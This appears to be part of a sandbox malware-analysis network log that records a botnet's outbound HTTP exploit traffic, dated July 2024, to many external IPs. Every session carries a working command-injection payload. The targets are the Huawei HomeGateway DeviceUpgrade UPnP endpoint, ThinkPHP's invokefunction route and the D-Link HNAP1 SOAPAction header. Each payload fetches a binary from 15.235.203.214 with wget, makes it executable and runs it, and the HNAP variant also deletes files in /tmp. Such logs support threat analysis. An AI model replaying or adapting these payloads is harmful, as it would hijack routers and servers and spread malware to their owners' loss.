                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      95192.168.2.2341330197.148.93.18937215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.223886967 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      96192.168.2.235137641.76.204.18437215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.223886967 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      97192.168.2.235592841.25.193.13037215
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:57.223886967 CEST851OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                      Connection: keep-alive
                                      Accept: */*
                                      Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                      Content-Length: 482
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 2e 32 33 35 2e 32 30 33 2e 32 31 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 15.235.203.214 -l /tmp/.bululbol -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbol; /tmp/.bululbol selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      98192.168.2.234150895.59.86.18980
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.707978010 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                      Connection: keep-alive
                                      Accept-Encoding: gzip, deflate
                                      Accept: /
                                      User-Agent: Bulu/2.0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      99192.168.2.234549895.189.55.13580
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.721821070 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                      Connection: keep-alive
                                      Accept-Encoding: gzip, deflate
                                      Accept: /
                                      User-Agent: Bulu/2.0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      100192.168.2.233324495.214.141.14680
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.731194973 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                      Connection: keep-alive
                                      Accept-Encoding: gzip, deflate
                                      Accept: /
                                      User-Agent: Bulu/2.0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      101192.168.2.233415495.185.71.13780
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.739445925 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                      Connection: keep-alive
                                      Accept-Encoding: gzip, deflate
                                      Accept: /
                                      User-Agent: Bulu/2.0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      102192.168.2.235131295.196.201.15480
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.748990059 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                      Connection: keep-alive
                                      Accept-Encoding: gzip, deflate
                                      Accept: /
                                      User-Agent: Bulu/2.0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      103192.168.2.234312095.65.53.18180
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.759475946 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                      Connection: keep-alive
                                      Accept-Encoding: gzip, deflate
                                      Accept: /
                                      User-Agent: Bulu/2.0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      104192.168.2.233471695.247.205.1880
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.767030954 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                      Connection: keep-alive
                                      Accept-Encoding: gzip, deflate
                                      Accept: /
                                      User-Agent: Bulu/2.0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      105192.168.2.2345724165.83.86.1898081
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.797832012 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                      Content-Type: text/xml; charset="utf-8"
                                      SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                      Content-Length: 640
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      106192.168.2.233284895.2.212.13780
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.807132006 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                      Connection: keep-alive
                                      Accept-Encoding: gzip, deflate
                                      Accept: /
                                      User-Agent: Bulu/2.0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      107192.168.2.2334728191.189.55.1358081
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.810193062 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                      Content-Type: text/xml; charset="utf-8"
                                      SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                      Content-Length: 640
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      108192.168.2.234884831.254.206.1458081
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.814748049 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                      Content-Type: text/xml; charset="utf-8"
                                      SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                      Content-Length: 640
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      109192.168.2.234021495.191.65.21080
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.816437960 CEST338OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://15.235.203.214/bolonetwork.x86 -O /tmp/.bulusech; chmod 777 /tmp/.bulusech; /tmp/.bulusech selfrep.php' HTTP/1.1
                                      Connection: keep-alive
                                      Accept-Encoding: gzip, deflate
                                      Accept: /
                                      User-Agent: Bulu/2.0


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      110192.168.2.235735427.92.33.1878081
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.818456888 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                      Content-Type: text/xml; charset="utf-8"
                                      SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                      Content-Length: 640
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      111192.168.2.235484691.130.196.718081
                                      TimestampBytes transferredDirectionData
                                      Jul 20, 2024 23:00:58.822956085 CEST807OUTPOST /HNAP1/ HTTP/1.0
                                      Content-Type: text/xml; charset="utf-8"
                                      SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`
                                      Content-Length: 640
                                      Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 [TRUNCATED]
                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>


                                      Session IDSource IPSource PortDestination IPDestination Port
